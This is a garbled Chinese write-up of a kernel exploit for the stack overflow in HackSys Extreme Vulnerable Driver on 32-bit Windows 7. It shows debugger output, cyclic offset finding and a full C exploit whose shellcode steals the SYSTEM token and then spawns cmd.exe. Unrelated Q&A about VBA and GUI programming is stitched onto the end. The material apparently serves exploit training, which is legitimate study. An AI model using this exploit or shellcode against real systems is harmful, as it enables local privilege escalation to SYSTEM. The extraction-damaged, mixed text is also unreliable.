bwin70xc000000e()HEVD -.sys?IDA
driverDriverEntry?driverIO? -\\Device\\HackSysExtremeVulnerableDriver?IRP?I/O handlerhandle?handler- ?IrpDeviceIoCtlHandler ? DriverObject MajorFunction 14?switchDeviceIoContrlIOCTL?
StackOverflowIoctlHandler ? handler?IOCTL
0x222003 ?DeviceIoControl?
StackOverflowIoctlHandler 调用 TriggerStackOverflow,后者把 userBuffer 复制到 2048 bytes 的 kernelBuffer;memcpy 的 size 用的是 userBufferSz,而不是 kernelBuffer 的 2048 bytes,所以这个 memcpy 可以越界写入。修复方法是让 memcpy 的长度不超过 kernelBuffer 的大小。
Handler
WinDbg?uf HEVD!TriggerStackOverflow ?TriggerStackOverflow ?HEVD - ASLR?librarylibrary?.
0: kd> uf HEVD!TriggerStackOverflow
HEVD!TriggerStackOverflow [c:\hacksysextremevulnerabledriver\driver\stackoverflow.c @ 65]:
65 a11a462a 680c080000 push 80Ch
65 a11a462f 68d8211aa1 push offset HEVD!__safe_se_handler_table+0xc8 (a11a21d8)
[...]
92 a11a46be 83c430 add esp,30h
94 a11a46c1 eb21 jmp HEVD!TriggerStackOverflow+0xba (a11a46e4)
HEVD!TriggerStackOverflow+0xba [c:\hacksysextremevulnerabledriver\driver\stackoverflow.c @ 98]:
98 a11a46e4 c745fcfeffffff mov dword ptr [ebp-4],0FFFFFFFEh
100 a11a46eb 8bc7 mov eax,edi
101 a11a46ed e867c9ffff call HEVD!__SEH_epilog4 (a11a1059)
101 a11a46f2 c20800 ret 8
ret?ret?ASLR
0: kd> ? a11a46f2 - HEVD!TriggerStackOverflow
Evaluate expression: 200 = 000000c8
ret 位于函数起始处偏移 0xc8 的位置,因此在这里下断点:
0: kd> bu HEVD!TriggerStackOverflow+c8
g
handler?CreateFileDriverEntry DestinationStringmemcpy VirtualAllocpage?shell code?shell code?2cpu?shellcode
A?RtlFillMemory(uBuffer, PAGE_SIZE, 0x41);
DeviceIOControl
TriggerStackOverflow TriggerStackOverflowret? KernelBuffer Size ? UserBuffer Size DeviceIoControl
View->Memory ?WinDbgesp
0x41414141debruijn sequencepwntools?CTF?python script?Python
In [1]: cyclic(0x864)
Out[1]: 'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaaza...'
userBuffer
char myStr[] = \"aaaabaaacaaada...avlaav\";
RtlCopyMemory(uBuffer, myStr, 0x864);
In [2]: cyclic_find(0x75616175)
Out[2]: 2080
2080bytesShell codeshell?
shell
shellcodewin7SMEP/SMAP ?shellcode?pagebitpageshellcodememcpy?
win7?shellcodeuserBuffer?
DeviceIoControl ?cmd.exe? shell#include
#include
#include
#include
/*
HEVD Windows Driver Exploit for the Stack Buffer Overflow
Written by glem - have fun :)
*/
/* Size in bytes of the single user-mode allocation made with VirtualAlloc in main(). */
#define PAGE_SIZE 4096
/* Number of bytes copied from shellcode[] to the start of that allocation
   (equals the byte count of the string literals, without the trailing NUL). */
#define SHELLCODE_LEN 61
/* Byte offset inside the input buffer where main() writes the pointer that
   overwrites the saved return address; 2080 is the value the write-up reads
   from cyclic_find(). NOTE(review): presumably specific to the analysed HEVD build. */
#define RET_OFFSET 2080
/* IOCTL code the write-up associates with StackOverflowIoctlHandler. */
#define STACK_IOCTL 0x222003
/* Win32 path of the HEVD device object opened with CreateFileA in main(). */
#define DRIVER_PATH \"\\\\.\\HackSysExtremeVulnerableDriver\"
/*
 * Lab proof-of-concept for the stack-overflow IOCTL of HackSys Extreme
 * Vulnerable Driver (a deliberately vulnerable training driver).
 *
 * Steps, in order: open the device, allocate one RWX user page, copy
 * SHELLCODE_LEN bytes of shellcode to its start, store the page's own address
 * at RET_OFFSET, send RET_OFFSET+4 bytes through STACK_IOCTL, run cmd.exe.
 *
 * Root cause lives in the driver, not here: per the write-up,
 * TriggerStackOverflow copies the user buffer into a 2048-byte kernel buffer
 * using the caller-supplied size. Bounding that copy by the size of the
 * kernel buffer removes the overflow.
 *
 * NOTE(review): this listing is extraction-damaged (escaped quotes, #include
 * lines without header names) and is documented as found.
 */
void main() {
/*
HANDLE WINAPI CreateFile(
_In_ LPCTSTR lpFileName,
_In_ DWORD dwDesiredAccess,
_In_ DWORD dwShareMode,
_In_opt_ LPSECURITY_ATTRIBUTES lpSecurityAttributes,
_In_ DWORD dwCreationDisposition,
_In_ DWORD dwFlagsAndAttributes,
_In_opt_ HANDLE hTemplateFile
);
*/
/* Open a handle to the driver's device object; every later step depends on it.
   NOTE(review): who may open the device is decided by the driver's device ACL,
   which is not visible here. */
HANDLE device = CreateFileA(DRIVER_PATH,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED,
NULL);
if (device == INVALID_HANDLE_VALUE) {
printf(\"[!] Error opening the driver\n\");
exit(1);
}
/*
LPVOID WINAPI VirtualAlloc(
_In_opt_ LPVOID lpAddress,
_In_ SIZE_T dwSize,
_In_ DWORD flAllocationType,
_In_ DWORD flProtect
);
*/
/* One page, readable, writable and executable, in user space. It serves both
   as the IOCTL input buffer and as the place the overwritten return address
   points to. Having the kernel execute a user-mode page is what SMEP (enforced
   by Windows 8 and later on supporting CPUs) blocks; the write-up names win7
   in connection with SMEP/SMAP. RWX allocations are also a common detection signal. */
LPVOID uBuffer = VirtualAlloc(NULL,
PAGE_SIZE,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if (!uBuffer) {
printf(\"Error allocating the user buffer\n\");
exit(1);
}
printf(\"[~] uBuffer @ %p\n\", uBuffer);
/*
VOID RtlCopyMemory(
_Out_ VOID UNALIGNED *Destination,
_In_ const VOID UNALIGNED *Source,
_In_ SIZE_T Length
);
*/
/* Per its own annotations this is a token-copy routine: it saves registers,
   reads the current process structure, walks the process list until the PID
   field equals 4, copies that process's token field into the current process,
   then restores registers and returns 0 in eax with "ret 8".
   All structure offsets are hard-coded. NOTE(review): presumably valid only
   for the author's 32-bit Windows 7 lab image - confirm before relying on it. */
char shellcode[] =
/* --- Setup --- */
\"\x60\" // pushad
\"\x64\xA1\x24\x01\x00\x00\" // mov eax, fs:[KTHREAD_OFFSET]
\"\x8B\x40\x50\" // mov eax, [eax + EPROCESS_OFFSET]
\"\x89\xC1\" // mov ecx, eax (Current _EPROCESS structure)
\"\x8B\x98\xF8\x00\x00\x00\" // mov ebx, [eax + TOKEN_OFFSET]
/* --- Copy System token */
\"\xBA\x04\x00\x00\x00\" // mov edx, 4 (SYSTEM PID)
\"\x8B\x80\xB8\x00\x00\x00\" // mov eax, [eax + FLINK_OFFSET]
\"\x2D\xB8\x00\x00\x00\" // sub eax, FLINK_OFFSET
\"\x39\x90\xB4\x00\x00\x00\" // cmp [eax + PID_OFFSET], edx
\"\x75\xED\" // jnz
\"\x8B\x90\xF8\x00\x00\x00\" // mov edx, [eax + TOKEN_OFFSET]
\"\x89\x91\xF8\x00\x00\x00\" // mov [ecx + TOKEN_OFFSET], edx
/* --- Cleanup --- */
\"\x61\" // popad
\"\x31\xC0\" // NTSTATUS -> STATUS_SUCCESS
\"\x5D\" // pop ebp
\"\xC2\x08\x00\"; // ret 8
/* Shellcode goes to the very start of the page, so the page address is also
   the shellcode address. */
RtlCopyMemory(uBuffer, shellcode, SHELLCODE_LEN);
/* set return ptr to shellcode */
/* The 4 bytes at RET_OFFSET are the ones that land on the saved return address
   (offset taken from the write-up's cyclic_find result). Arithmetic on LPVOID
   relies on a compiler extension, and the uint32_t cast assumes 32-bit
   pointers, consistent with the 32-bit disassembly shown in the write-up. */
uint32_t *ret_Addr = (uint32_t *) (uBuffer + RET_OFFSET);
*ret_Addr = (uint32_t) uBuffer;
printf(\"[~] retAddr offset @ %p\n\", ret_Addr);
/*
BOOL WINAPI DeviceIoControl(
_In_ HANDLE hDevice,
_In_ DWORD dwIoControlCode,
_In_opt_ LPVOID lpInBuffer,
_In_ DWORD nInBufferSize,
_Out_opt_ LPDWORD lpBytesReturned,
_Out_opt_ LPVOID lpOutBuffer,
_In_ DWORD nOutBufferSize,
_Inout_opt_ LPOVERLAPPED lpOverlapped
);
*/
/* The declared input length is RET_OFFSET+4 = 2084 bytes, larger than the
   2048-byte kernel buffer described in the write-up. An input length above
   the destination size is exactly what a driver-side bounds check would reject. */
DWORD bytesRet;
BOOL bof = DeviceIoControl(device, /* handler for open driver */
STACK_IOCTL, /* IOCTL for the stack overflow */
uBuffer, /* our user buffer with shellcode/retAddr */
RET_OFFSET+4, /* want up to the offset + 4 (for the retAddr) sent */
NULL, /* no buffer for the driver to write back to */
0, /* above buffer of size 0 */
&bytesRet, /* dump variable for byte returned */
NULL); /* ignore overlap */
/* check if the device IO sent fine! */
/* bof only reflects the return value of DeviceIoControl; nothing here checks
   whether the process token actually changed. */
if (!bof) {
printf(\"[!] Error with DeviceIoControl\n\");
exit(1);
} else {
printf(\"[*] Success!! Enjoy your shell!\n\");
}
/* pop a shell! */
/* Runs cmd.exe as a child of this process. NOTE(review): a child created this
   way normally gets the parent's token, so a SYSTEM-token cmd.exe under a
   low-privilege parent is a useful detection signal. The device handle is
   never closed before the function ends. */
system(\"cmd.exe\");
}
shellcode?
wx_rd.cheung ?求大神解答 1.windows编程和Gui什么关系 2.vb编图形界面和codeblocks 编图形界面有什么区别,谢谢
纯办公来说的话,vba更实用,VBA是Office系列自带的宏语言,与Python、VSTO和RPA最大的优势就是不需要单独安装IDE(集成开发环境),可以直接在Excel中编写。VBA比较适合非IT专业的人员入门编程,除了不需要单独装IDE以外,VBA在调试的过程中是可以一边调试一边修改代码的,虽然只能改断点之后的代码,但是在日常学习中也已经比较方便了。
Python的优势是类库比较丰富,语法很简洁。Python能做的有很多,工作中对数据的处理,都可以脱离Excel用Python来做。基本上除了Excel插件之外,都可以用Python来处理。
扩展资料
VBA是基于 Visual basic发展而来的,与VB具有相似的语言结构。从语言结构上讲,VBA是VB的一个子集,它们的语法结构是一样的。两者的开发环境也几乎相同。但是,VB是独立的开发工具,它不需要依附于任何其他应用程序,它有自己完全独立的工作环境和编译、链接系统。
VBA却没有自己独立的工作环境,它必须依附于某一个主应用程序,VBA专门用于Office的各应用程序中,如Word、 Excel、 Access等。在 Access中,可以通过VBA编写模块来满足特定的需要。
Windows编程指的是学习WinAPI或MFC,包含Windows下的GUI程序,也包含socket编程等其他。
VB源于Basic,既是IDE,又是语言,提供方便的GUI设计功能。
Code::Blocks只是IDE,一般用来写C/C++,当然也可以写Python什么的但不方便。
在Code::Blocks下写GUI程序,完全取决于你所使用的工具。
你可以在CB中写WinAPI甚至MFC程序,也可以使用其他库来设计界面。
CB本身的界面是wxWidgets做的,wx有众多语言绑定,CB用的是C++库。CB提供的wxSmith等UI设计工具也是针对wx的。
C做界面在Windows下只能用WinAPI。虽然GTK+也是C也有Win版,但十分不足。